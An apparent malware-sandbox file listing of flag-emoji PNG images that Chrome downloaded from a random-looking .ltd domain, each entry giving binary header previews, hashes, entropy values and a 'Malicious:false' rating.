                                  Preview:.PNG........IHDR.....................PLTEGpLz.m....TGI!q...N2..wDF...b...r..(J*y...{E3.eb...._s=..qM....Q4...`......N2.G..`........de...L0u>..u<....cZ......K/...u@.....c...a..t?..E+.W;...d......O3s=......a.L0....j,j..\......................................................................................................................................0....1.a....T.8...).F.............U...*...4....}.W...~..}..>.|..~ .{..{......I.z..y..y..x.>...}4.w.>...z&^...v..u..t.<......u..s..q..s..p.J.}.o..o..v<.n..m..m.S.{.l..o".k..j.4.uC.v.j..g..f.E.s..n.g.4.p..m.b...k6.m..j.a...i$.h..h..g._...f6.g.\...c..d'.f..c.\...a..`..`.._..^..^..^..\..].T...[..[..[.T...Z..Y..Z!.[..X..W..V..V..V.P...T..S..R.}T..R..Q.K..K...P..P..O..O..N.H..G..{L.vL.rM.G..pL.C.zC.}A..qExA..jDv=..d@p:..]=.W9.X6.R5.M/.H+V_......tRNS......!&19::IQUU^`acddgxyy~..............................................................................................................d..^...AIDATx...An.U........$NR....[....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6332
                                  Entropy (8bit):7.934004795098357
                                  Encrypted:false
                                  SSDEEP:192:OtZuqy+gT/QXWiRcxHfvfP4654tKPEv332w:OtZu0Y4GQcxfP465HPE1
                                  MD5:C7F2437B49177EA45B571F714C1E8243
                                  SHA1:C3E15D330E9630B5EFD8283C02EE08D0E7E93FA4
                                  SHA-256:0D381380D35A122EB5367813B8A0F6762D32BF87D9219B94C4B4BCF9E10318C1
                                  SHA-512:ED30CEB6DE7C8F69F3D6032998941C49751415ED2E4927EFCAEF30232838654A4475E301277CF482DB796CF44B982D736CF65F05B95AFB84EF0D00AC5E411D3B
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1f0.png
                                  Preview:.PNG........IHDR.....................PLTEGpL6FgW_|fv.....$G.ow..Co~.ip...B..Azz.....0\br...B.....7;Hhu..s....Fq|../:.px_o..!Diy.. C..^n.. Cgw..!E..=br.p...'J. C..;....................................................................................G................................A...............e...................|...Y........zd.....Y.x....n..........g.s{.}L...w....r.dpT..sM.ltr...}w.uXc...blg.w.T`.tfhz._y.D...hD.lV.R]as..FU&..`>Vp.rki4|..Y`Zl.Ul..:J._H.~.AN.7GNg.7p..2CGqYOc.Ybq.u.zXI.1AFb..-?.7D.q..->|EoF\.?\..):.'8.k..&79W.#c.>V..!23S.qE0.:..d.._..#3.P.5O..a......>%[d,M.)M.)M.(L.(L..[.(K.0J}..)'J.%I. \7%H.^;3#G.#F...$"D.%D| D...!.B.+?d.@. ?x....ML.=.^...Q).. ;q.;}.9|.8v.7i.7o.7t.7z.6y.5w.3g.3v.3s.2t.D..0^v...0r./p.,U.-q.,c.,n.*l.(N.)k.(h.'Y.'h.%a.%g.#I."R."[.!d..C..S..I..=.(FR...ptRNS......*-/A@RVXbgu~~~~~~.........................................................................................G......IDATx...p.....u...%.....`.....0....(.G.d.;.:v....f..V6.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3846
                                  Entropy (8bit):7.914429305632146
                                  Encrypted:false
                                  SSDEEP:96:MODbfCWrsPkZd0vweydplkr0f25CS99VOPHci7Czy:MOCEcwJlkwfyjVacZzy
                                  MD5:D5C9793BF7D16D9FAF75C47DA592B057
                                  SHA1:DCD1686F15B3EAADB4CA12B63A03B58CDE28AC2F
                                  SHA-256:121C033748179D8819919E14DAEAE8BD1A0536A9A3B27661556F928B08FFC14A
                                  SHA-512:635D8FD815701BB40E27F2528EBC464B0BF65372DCD101F38C50956AFCD20A2A4797788A2390E34253D9428445F1ADC09C9C3A52D2A266CD1578CA6561CC1477
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.{{.tt.gg.uu.WW{{{.gg....iiyyy}}}.YY.............ii.NNuuu.......aa.......hhyyy.11....hhvvv.__xxx....hhxxx.dd....//.kkuuu.]]yyy...............................................................................................................................................................................................................................................................zz..........ff..........ll.gg....dd.QQ.^^.``|||.ZZ.__xxx.UU.YY.[[.OOsss.II.SS.NN.CC.HH.RR.<<.BB.KK.DD.;;.55.//.CC.66.11.99.**.''.&&.&&.&&.%%.''.**.$$.%%.$$.55."".99."".!!."".**. .$$....,,.............$$..........&&...................**.......................................................................................................................................~..@-.....,tRNS.....$)57@AOVcccefjw}~.~......................0.....IDATx...K..U.........AC...Q8.L..=..%.F...^...TQ/...".....S..Q..eeeo{{{{{{{{{{{{{{{{{{.*...sF&...i.........N9|.P.........L
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6110
                                  Entropy (8bit):7.941366960374876
                                  Encrypted:false
                                  SSDEEP:96:njC48ynpYtUkWBNw8EwXMEFxoTxrCYrc0gm+6hTYwrNiMA7RljXkbIxakN:n24nY0mGAxrCYJgmHTYwrkMElkK
                                  MD5:7DBCADA0A572B03519728BBCC0B94D62
                                  SHA1:EF357BCF792FEC54FB4CAD73085FDE508113F3AA
                                  SHA-256:EE5C0468EC8FD5275510ACB47CD38C9BDF35F1D6D4D9D982DF07D73096E9F500
                                  SHA-512:1DB531ABD3A22895D06F1BEBD7E0FB7437D2AFABB57E80FC4B2FF991521C0A3D29D260415D9B4955EADE9BF9EAF39FA2BFAC2830BA5C6E117A0BD0BF3483164C
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1f1.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.CGh...orj...jng..f...twg...rvf...KO.mqt %.(..uy.6;g...lpg..u.../3g...nq.x{a...ILn $`...pt._cl."a...vyh...jn.txg...nqh...wzl.".x{.ilm.#`...AE.Z].im.bg.GQ.di.]b.DN.Y^.AJ.dg.]b.U[.`d.CM.BK.PV._b.BK.=G.RX.LR.V[.?G.AI.vy.AI.HO.KQ.@H.=E.;D.SX.DK.TX.?G.<D.DK.?G.9A.JP.?G.=E.>F.LQ.>E.<D.9A.6?.:B.=D.;C.GL.>E.6>.9@.@F.:A.KO.CH.7?.5=.6>.5=.9@.6>.3;.;A.4;.29.2:.5<.08.6=.18.:@./7.07..6..5.5<.-4.28./6.,4.-4.8=.+3.39.,4.*1.+2.)1./6.-3.+1.6<.(0.17.'..-4.'/.*1.&-.6;.'..,3.$,.%,.$+.(/.#*./4.$,.").38."*.").!(.+0.-2.27. (.&-..'.#*..'. '.)..-2.37..%..%..%..$..%..$.-1..$..!..&..#.."{04. &.'-..!.#)..!..!.&+s04..$.&+.. ..$i/2s*.}%)....."a-/.....#v"&e'+q!%y."Y+-......n."P+-}..k..H*+s..z..A)*N#&u..f..o..8((e..<"$0&'_..)&&%&&1 !#$$"##.$#"!!.#". .."!......................qu.hl.mq.ko-q.....1tRNS.....#"17BGPUX_cegfwv~...........................FG.C...\IDATx^..=..0..Q..B.........ti.Y....w..........X..3s..p+.....,j.mGD.q....[-.S...[..............HC.W1......^.`.Y...(..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4259
                                  Entropy (8bit):7.907995832091385
                                  Encrypted:false
                                  SSDEEP:48:htYjxb6iT11H5qcX1nvj/WipAS4bIuPFBEEXFlG6zlAGsvpEC61UZe2ANumxwNHg:Y1681HAc7pz4EylGiAGsvqC6SDgeFLm
                                  MD5:E12D12C335E6D092D0DD943E2CF1D341
                                  SHA1:778951F9FAD005CED8E2899AF07C12B7B5D0D911
                                  SHA-256:47E91D916196929F3FDE8F93B8AEB928CC376775BAB65A51868D31001347338D
                                  SHA-512:CBD1E81FEE21EFEA2D14A4AD68FD5B350C6CDD197C9C2A6D65C495EE5F08B4B39E36994FC684B7861053242A9A6630F94E42A7CE371F02BC24BBF22C47E30627
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLy'6.`n.fti.".l{.bpi.#.n|.mzh.".r.i.#.`n..3.p~..Bi.!.esi.#..-x...*<.ft.q.h.!.BS.n|j.$.`n.lzj.%k.$.s.f...lz.esa..o.).m{d...r..Qa.cro.(a...<I.....................t.._...o}P.w.jy.cs.ft.]o.Ym.bq<.g._m.Rh.Tg.Wh.Jb.Yi.Ka.C].Sc,.[.L_.<X.@Y.L^&.W%.V.AW/.V.7S$.U..UA.T..V.3QanS#.T5.S.3P..T.LT./Q".S.3P#.S.)PJxR.%O.ZQ!.R.8Q.@U!.Qy^P.0N .P.0N.DS..O.OM..N..L*.N..N.>R.0L.6O.)K..N.,J.-J..L..K..I..K..K4xK.7L.*HMjJ..J."G..I.*G..H.-H.1Jd[G..H.'E..G..E..E..F./G..B|KD..F.%C..E.(C.~E.~D..C.~C.#A.)C..A.|B..?.!?.{A#q@M[?9e?..>.z?..=..=.)@.y?.!=.%?..<.2@.x>..:..;. =.|;..;UQ;.v<;];.%=..9.!;..:..8..7..7.s9.%<..6..5..6.q7|55..4.r6..4..4..5.$9..2. 7.o5..1.&6..0..3..4..0."1...../../..-.....-..3..-..+..-..3..,..3..+..+.....0..*..)..*{....+..&..&{.+s.*..&..#y.%.."o.%|..i.!w..l..d.._..3R...../tRNS......&+4<=LNVceggtx~~...............................#IDATx...Kn.....o.....!...H^(2,.A.x. Y..9@.u..u.,...A.9@b....m. .....j..Gl.8.~..oP5.^.P.B...7.g......-p...7..n.[....-p..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3527
                                  Entropy (8bit):7.866956458166557
                                  Encrypted:false
                                  SSDEEP:96:x6yGCxiSnL81RhNRK6nnYbyhU07hJoPu12eEKCVyl8QM:xpPJLO/HYbX07HhoF/AlXM
                                  MD5:C6022F61E14FE63E08EE88B94C74814B
                                  SHA1:1AE0BF5EA2DC58DC171D83C569989282A50A1BB7
                                  SHA-256:6877247E97B03BE653A9153CC26B5CA09CA726B367781C7F13A9B89AD599B734
                                  SHA-512:DDD85CD664F5F4BC78B79609FA0210E12A3EF0CDF04A822F4E936D355A3E4F2965B604FAEA1824EC1DE0A678D2091FAE03433BF193F5C122960DEF8E9E369DF6
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLsK=.w..tT,)j.!..t.jE-&.tc...lh..r...f.E-]....#.j(...v.!.D,.n.A)t.!.M0i...E-.ot. f...B+H.iu."f...D,.t.C+..dc..w.".C,.se..v.#.G/.sm..BhQ'A0..4..3..3..0..8..7..8..6..2..6..6..3..6..4..7..B..0..4..L../..5..,..U..@..+.....)..]..&..9..8..$..H.`.r.."....j...#...$.@.%...e..;.%...C...&.P....d.".../...?....\.=.$......N...A....&.v@v.s. ..!..!d..._B[.X\.~M.yV.x.a!.M??.sK.p.@D0.kD.k.6K.4K8.i.4J.3J.3J..i.1I .e.2I.1HVw].(E..d).e.(D..c.1G..g..b..F.'C.B$..a.-D..`-.a.._.._<za..^.P)..D..].*A..\..[..L..[.'>$~Z..Y..X.,?..l..W.$;..W..V..U.!8..T.{T..R.)<.!6.~Q..5.}P.wQ.|O.!6..3.{N..2.'8.zM..1.!5..;.wK../.oL.vJ.uI.tH..,.hI.!2.sG."3.%3..+.qE..1..(..+.oD.lB..&..%../.bB..$.i@.f@..%..%..,.Y<..).a;..#..(.Y6.T6|.&.. .L3.O0....K.t...F-.A).>&l....o.....tRNS....."%2376=?JSR_cccehkv|~..................................................................................................................NH!....IDATx..Mo#Y...{.*.$.i.g.3b. ."
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6219
                                  Entropy (8bit):7.9383581311807685
                                  Encrypted:false
                                  SSDEEP:96:pdpzFcZCAOqU8DVj/fbWNQg78pLaNVGl2r89rB3Mfr2Y0ch5xW335KQYgkB1fXMd:3pmU85LfbWNQgkazGUAkfR+pdXd
                                  MD5:5490EF2FD940C91DBDD3F549A3792782
                                  SHA1:ABD1FD93F4CBC50D0CF9B6B0E162DDFBC5CF43B9
                                  SHA-256:FB4EFCB76E7DD8519E700D0A37D72CD6A90FC721FD2262A444D7D0E843DC595C
                                  SHA-512:DF60D5CFF50C530D322182124F37248D07FAEC9690AB644D3E64EC2F18DBDAB3E0FEFA6E368E87AE06A69A87C450FCF83C0D804A168E392191F6F7E8CBD318B1
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpL\\.22fJJ}bb...Jhh...Cgg...J__...B........_ll...D__...N......ww...HCCn``.ll...Djj......D\\...Cjj....^^...Eii...Fkk.\\...J..=...77r.................................................................................................................................................................................................................................................................................||.{{.tt.tt.nn.nn.jj.ll.ee.ff.cc.cc.``.\\.]].[[.]]zZZ.TT.VV.UU.QQ.QQ.PP.MM.KK.HH.II.BB.CC.BB.CC.>>.AAz::.::.55.55.44.11.00.--.,,|)).**.&&.&&.%%.**h$$.$$.%%{""."". .!!.........{...........t........j...........y..d..s.....[.....u..{..j..a.....S.....|..s..M..\..y..w..n..~..K.....v..s..d..Y..p..r..R..o..}..F..m..y..o..s..l..i..^..e..[..b..U..@..H..L..<g,.6...,tRNS......33>HUVcccdgsz~~~~.....................H>.4....IDATx..[.$.Y...RU]U......b'..5I@..."...%.%R....."...@....B(...D.$...."...BDH bH".g....].ef.g.{..U.u9.0u./....^{......Q...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4912
                                  Entropy (8bit):7.8418637915095415
                                  Encrypted:false
                                  SSDEEP:96:5DbmjepM+w4jUQEwhw+AAlyGGdkUDoedrWYDFHlYVGRm0p6:5bmapZGIN8d3ked8ML6
                                  MD5:9484C455A7B16FF0CD0B05EE0BC89F08
                                  SHA1:343BBE9E5C2DE3994A1E6B18B2947DD08909EE51
                                  SHA-256:1ECB9CAAA6F27604125F3ACCE0ADBDACCCC55C3BD6163C426B5470B92F05E886
                                  SHA-512:D29C861B82B166D91ADDBC128E7B3E33A6609C5FF158335A7259F5AD6C7321B50F60221F543BECBCD3492C630C733F09616A3E3B1187814B23DE3DDC33AEE509
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..........................................................................................................................................8V..........*K..........._f.MU.....................jq.",.)3.-7.;D.............G.......f......%L.#J. G..R..E.&J..E..F..F..F. G.%L(4P..E..?..>..C..K. W."d9Q..........`w....Qj....G_.2Gu........................4..<..I..W..n.y.u..i.w..t.x.w....!G..@............................................:::.........(((...w...}..v|.}..z..z...!..#..&..).,.....0.1.3.6..8..>..A..R..\.f.v.m..k..d.Z.U.B.D..K....5..8..:..<..>..@. B.!C."D.$F.%G.(I.(J.)K.*L.+M.+M.KKKopq...............CDFxyyeefYYY111.7z.._.7m"=x'D.'G.#A. >~.:t.3g.,Y.)R.&O."L.'[.(f.)n..o.'o.&n.'p.(q.)q.*s.+t.,u.-w./x.1z.2{.4}.7~.8|.6u.3m.0e.0b./`..?.....tRNS.~....................................................................................2ARv.....$...............d.g....~i......dC$.......W4....................~..................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5497
                                  Entropy (8bit):7.941502317322381
                                  Encrypted:false
                                  SSDEEP:96:SZugToRZGdmbRfZ5UssVE8JZ26Zt+kanR0Eh6CNWqxrAuNS1rrF2NPKya3Vb7oMx:SwQo1z5i33L+kuRT6gg52NPK/oU
                                  MD5:0A369F4185F6D60AE6CCBFF901890EC4
                                  SHA1:4A84BE85353566DACD0E50C81B3AC1BBAA449C97
                                  SHA-256:AD5F1E34653B7858219AB0EA4DF58F115B85727AC1FB26B179AEB1A400554232
                                  SHA-512:FACC36B0233D17E87AFB6AEBCA77A66FD217B33490A92E888F2F6F70335F2A03DECD6839EC93D6248D5C73DF07206C1F6644E41AB631BDB8803CA3A9A7515EA2
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f4.png
                                  Preview:.PNG........IHDR.....................PLTEGpLHtj"MDh...@6b...;1\.~.:/k.._...;1e...:0<oc_...TFj...B8.6+Dvkd...L@.=/e...9/.;1<lai...<2_..f..R.u.9/j...4*_...A7g...<2/cXj...A6.3*.A7\.}...................................,...../..2.....6.......8.....=.......A........G.....Kz..p....Pi..`..v.Uk..X..h..c.[d..O..`..[..^..U..T.]E..W.}N.~X.yL.zF.{Q.x;.{A.xP~t?.b8.v>.sE~r3.sEyn0.p8|n-.l0}l&.m@ti7xj&.l&.l$.k)}h%~k$~j$}j5tg$|i!}j*xg!|h"{h {g3qd.{h#xf.{n.zf*td.ye.xe.ye.wd.wc.vc ta.wi.xc.vb.wp5i^.ua"q`(n_.ta.t`.u`.s_.r^.tn.r^.n].q].p].ri.s].p\.o\.jZ.o[.n[.mZ.kY.pr.mZ.mY.pZ.lY.fV.kX.lX$bT.iW.kW.hV.jV.nX.lw.jV.iV.jx.fT.iU.hU.hT.lU.hT.gT.cR.gS.fS._P.dR.fq.fR.eQ.iS.dP.cP.bO.cP.\M.fN._M.bO.ZK.aN.`M.cL.WI._L.`L._K.^K.]J.TF.\I.]H.[I.SE.\H.[H.[G.ZG.ZE.TD.YF.OB.XE.WD.L?.SB.Q@.I=.N>.K<.F:.C8.H8.G8.@5.D6.>3.?2.:/.<0.7,.4).0&..}.....tRNS......"%188DQSU]cedimy}~..............................IDATx..{p\.}..q...V...d[....l.b 8.....H:L...L...P.0ig.4.t...i.vZ...v..$.C.2....M.../.XX6`.,i.]...9..{W..5.....vW...s.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6443
                                  Entropy (8bit):7.947803689340011
                                  Encrypted:false
                                  SSDEEP:192:qorVDDW9RQOi3jE0Sv5tGdrBN0yi/PCQ4:3DDW9RJdGR9l
                                  MD5:8893BD3B330F2E00000312B8D55173D5
                                  SHA1:692A2A37F63969164409663CD993AAF871232772
                                  SHA-256:4F99F5CBC08A8B0A99EDE93FEB3216394BC8EAE99A1DFF6A96B002BB75F20B73
                                  SHA-512:0C8454796253ED07595A0DB4C0902EF24553FEC53A6CA8B68D59A27F2FCCE65FF4B6361A27CD9F65BA20C52E75798D7F1D753F9E1796A029553929A3DC17BD91
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpL...r...[[.PP.....9d..h...glh..f...ghe..f.._...jje...13.gs._`f..h...aa.kl.e..x|.ggn...hhsf.f..v.................zJX.w..HH.........&&.$$.%%.&&.... ....!!.%%.......&&.........`...........w......##..............u...#"y...."".....M.....h..]...h......$#..a.........n.....%%|q................;...m.......l...\..x.....7RR............nnm.00)|....-.#.......*..%.......... .......**u..n?$....FF0.........=..T..QQ..32E$j66.BC}.&"^da1.&&......../>@...{......" ...O...........O4.8.-=.2\../-#.ffTQJ...{wt87qwx....6bl...J......xx..M....7""b.w.~GH.B.6...oA($n.......c_2tr9.|Ex&7.;;....Q.@.H.......QQ.EE.T5v0..CRwnf..CA....SS.PP.45....DD...!#.66.)*....XX....LL.!!..........%%.vv.................aa.DD.................ee.AA.........UY..........................hj......[a........,tRNS.c}...~....//g...C..Z..s?.e.S..a.~~~...~...Cv.....IDATx....k.p..qe...A.@...*...k.....`x..;9D<x\...2&...."...yQ<..<y.S....&mm..v/.k..:.....D7.......?........D".H$..D".H$.i.DQ..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4111
                                  Entropy (8bit):7.918760033871161
                                  Encrypted:false
                                  SSDEEP:96:dNJW00tko0eyqtzMOFF70b7jzRXvkLw3zbL9yMJ8:FWZtkAzl0/BgwXLH8
                                  MD5:CE2335F8A3CDF3824FB1571005AA1F21
                                  SHA1:4F2B1C7EF76884C5A0C7D29CC817944618A85273
                                  SHA-256:8059B90F702AA3280FDCA4527D1946794F548A1F38B19622FC746AB85C7FC31E
                                  SHA-512:E5846AA07F004AA340E03BE01E145C88A73E04111A78C0A9E84302E3C7D074836F7FDDCBB28E4031A3C11BA6F3581F5D2420BEAFB05F6F75B4B66A83AAD7C185
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL3"$.iq....el.......nv....mu....CM.ow....... -.......Za.jr......IIIv......&1.lt....CK.ow....el....qy....ip....jr....rz.SZ....dl....<E...........................................................................................................................................................................................u.......b......{..........w..p{D...jv.qy....mu.ir,.y.bl.We.dn.]g.dl._h".s.Wbxxx.Yb..n.]e.P].S_.KX..k.Xa.ES.IV..f.MX.Q[.?N..cjjj.KU.:J.?M.CO.4E.6G.4D.3D.3D..[.2B.3C.DO.0B.7E.>J.0@..?.2A.->.6C..P.+<.,<[[[.):.5B.+;.'8.0>.&6. 2.$5.#3.'6.!2.*8QQQ..0../....!0..)..9..,."1..-..+..)..)III."/..%..'..*."...&..$..$....."..*.. ..!???...........&............~..333...w.....&&&%%%###""" ..........................................................+5....-tRNS....#"17CGSU`ccccjstx~~~~....................Y|......IDATx...[l..y...9g.;{.H.H.V..R.4Nl.. ..4m..@..E...._.>.1.-..m..m.@@....E...p..74P.(.e.,.6.E.u./{.9s..R..`...)f.?....r~...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4726
                                  Entropy (8bit):7.932101573248386
                                  Encrypted:false
                                  SSDEEP:96:zr9YwXbBgTFoT4sA0POXZMsQIRU6EspoJJDnEM89wvfF9Rxo4ly6DqEO:zr9YcgTFoT4sADXWsQdeoJlo9wToItDc
                                  MD5:22D66BF276097E54E6AC51E6F8E1DEAC
                                  SHA1:2872984A0D4D9D9F4F93ED65B31AC10F27CAEBC3
                                  SHA-256:834804BAAE7EA1E2DDD91A2FB33917CB3BC47FD3453E6F3316D774698FB320E1
                                  SHA-512:4E73DBF05E23DCE02319A98C7D2956F2D93F9E0D96FCABD120F4C7AE80078A44A5143540119C2410E9C51240EB784ED658A535BCFCC81FA970908D86B21E9A8A
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1e8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.$L.//_x..ll....X8Xad.?%f...@%.A&.B&.C).=*.....u~.; .A&....?&e{..H.5Uq{~.dy.......=&f~..G,...c{.zr..oo.ff]y..nn.?c.kk.?#Zs..sq.ff...<Wxvh*.HH.:w..k.FF.8t..l.!!.&&..d.....g.6q..f.<<.DD.CC.>>."".00.99.@A.<y.....j.......>{....77..n.++.33.//.$$.d1.H..@}....K...`..b..m.E..33....,,.J..sA&.W.B~.((.4n.#K..\.g4..n.j8.*Y.-a.44....1h.4q.,,..V..S........[...".S....o<.))....55.E'....C...O..Z............!V.[8.b<.yC.nD.BB..t.M.O..Q.?#*V..}J.8..K.Q1Qm..h@.^/.//.V5..~.WX.8?..z....iCg...~....//...4_..uI zM.%O..s.bc....X)....%-.<.....M'......o.1ADc..MMWs..G:\...[.."..w........W.1..bT.&x.):.@@..n.<<.TH.S+....yP.FGe..&Kv.RI....H.......wu.y/}U..K...Y.|D.k....c....V...<6...hxs.....j..Q.^........M..=z..Nia.y/xj.."".Ah.EEy.a..lh.......Wt ..! .'&......yUI;L<.zzGnFS...0tRNS.~c..bc.,..Fb..h.9.:w............$.Ve...Wzl..}*/P.....IDATx...y\Ue...i,1.b.%K.KgZgT\........@...jI...8(*n...n(.-@.......&D*.....T..X...<...s..rA..._/^.~...<.{/.IMMMMMMMMMMMMM
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4460
                                  Entropy (8bit):7.810940342424677
                                  Encrypted:false
                                  SSDEEP:96:76hg+QfWj1dkr3lss706Pwehgx2renLBJwsbkvW67cGeNyya/KJJYGXm:u8rVdQ6Pwehe5L/X4vAGeo0bY4m
                                  MD5:0AFFC5B72BB4F04CC949079A77423179
                                  SHA1:8D3101B3EA048983CE1370C3C879854A0223084E
                                  SHA-256:C4D6A91D5237DB7689D3256DC83C367256B635346C592FA5CBC3B7358066119F
                                  SHA-512:780779E8B52D767DF5C5F0AA8D64AFD34520B11E53ACA5A28C90D902F52963719BE5CFE031BA08403492CD2AEBABFEC9DBE3FAE4C5AF016739F2E63C82AC6EBF
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLh...qx.hpg...emg...nvf..g...CM.nu. ,G(C..Rg...fmg.....p....=.&1.muh...CKg...nvf...gnk. a...qy.fmh..i...qy.X`.emb...=G.......................................z...qy.lu.hq.bl.fn.\g.ck.^gd|..Va.^f.Xa.P].Yb.JX.DS.NY.R[.FSTo..>M.GR./:.KT.>L.8H.0=.AN.3C.1A.3D.3C.6F.3C.1B.1B.BMHd..6G./A.1A.=I.+:..?.&1.0@.-=.5E.+<.+;.&4.8L.-=.(9.1@>\..8U.'7.%6.+:. ..#4.;^..(.%4./C.!2.)7.%4../. 0./C..-. /^?i.&4..%0P..!0..+..*..N.....*k3XCBs..'..,."/..)..&...0Ez&H.."/..$%G~..#$F|.....!#E|.H...*.. ..#"Dz..&..,P1[!Cy..&2<n... Bx.H..Aw....@w.D~~.(.. .?u....>t..%?0[.Az[%Hu.8.<sw.%.;q....:p...q.$.9oy. .>z.7n'0b.6l.6r^.:...m...5k.4e.4g.4a.4jG.F0(R.8r.3iq...2h.2gz...0[.1g.2m.0ff.../er...-Q..d.-S.+T.-c..j.,a/.Hf...+a.*`.*_.)_M.(.(^.)e_...!R.'].&\.%[.%Y.%`.$X.#Y."W.!W. R$.1..L..E..9..=..<.......tRNS.....(+<>OUacccfvv~~~..............................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4288
                                  Entropy (8bit):7.798406196206517
                                  Encrypted:false
                                  SSDEEP:96:XB4vpboqdhIFgoGrYcCMgyRgAWAhOGx9IUoWBup+:x4eqduFivCMgmgoD9IGu0
                                  MD5:0F22223C07B642A1EAAC664347E55939
                                  SHA1:F3D142E68324E15E9E90F0D1F313CEAAB9AC2275
                                  SHA-256:5B998721BF7DE2D39D2419D97F9D24A93B9A11A76C43478C51F0EE26F2593B72
                                  SHA-512:575FB25B38803C8BF61EDEA1AC9E7E721448D4AD690055F2C4CE65338FE157E783105E8D09C1CEE708C752445B44B2E7BF08AC8F19C5F6B965B22E97CE763067
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.#.."..$..)!.-$./&.2).4+.4+.5,.7-.8/.8/.:1.;1.=4.>4.>5.@7.A8.C:.D;.F=.H>.J@.LB.ND.OF.QH.SI.TJ.VL.WM.XO.YP.PL.JE.rP.~Ua.XM.Y9.].._..a&.^%.^%.]#.\$.\".Z!.Y .X..V..S..R..P..N..K..G..F..A..>.~;.|9.z7.s7.k2.^-.S,.P).K&.E .E".L).............................._Z.]X.91.82.=6.A:.C<.C:.@6.5,.&...........|w....(..;2.91.3-./(.)".-&.2+.2*.z?1x?.91.4+.ia................D9.;3I|G..N.WD.?;.E<.MD.UM._V.f\.lf.vq.yu.uq.ur.tp.vr.md.bZ.QL.H<.M3i[6Ck:.cF..S..X..^p.SttI.bZ.tl.................................................................................................................................t .u!.x"..#.v..t..{...ok.U0.P,.P,.P,.K)!H(%D&BQ6.Q,.S......._R.3).2).-%...............................]U.OH.oi....!..'!n2&.c3.f:.Z3.V1._6.p?.{F..N!.Q".V .S..J..G.uA.k<.c8.Q......tRNS.~...........................................................................8k....$TUcc................................................^%.........................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3612
                                  Entropy (8bit):7.875604717142779
                                  Encrypted:false
                                  SSDEEP:48:hTlrHkgEQkGvggY0IwkGaF2Gj0T7otOzLakYaWWjPd/VvEot3znbUGDb0Tdbz:RlrJEqvK0ILGIu7oMmkYqFG+3zBb0hz
                                  MD5:EC5F46E9D66F9AF2C747D654586B2C15
                                  SHA1:27B0BF4CC7BD11B0DB5CF1BB9CE270759D3A8A61
                                  SHA-256:013932383E6B581B96E042A2417BAA95F7CBD69C0448F80710D8D8B504E5290E
                                  SHA-512:E62D65DED9AAA736C503260C41049F467B869AD04EFA06389150D34F11919B1F4E0B6F34C2B9DD837EB32EB6F797C0AE9E20B9CC58FD7D0FED12E5F26214E0E2
                                  Malicious:false
                                  Reputation:low
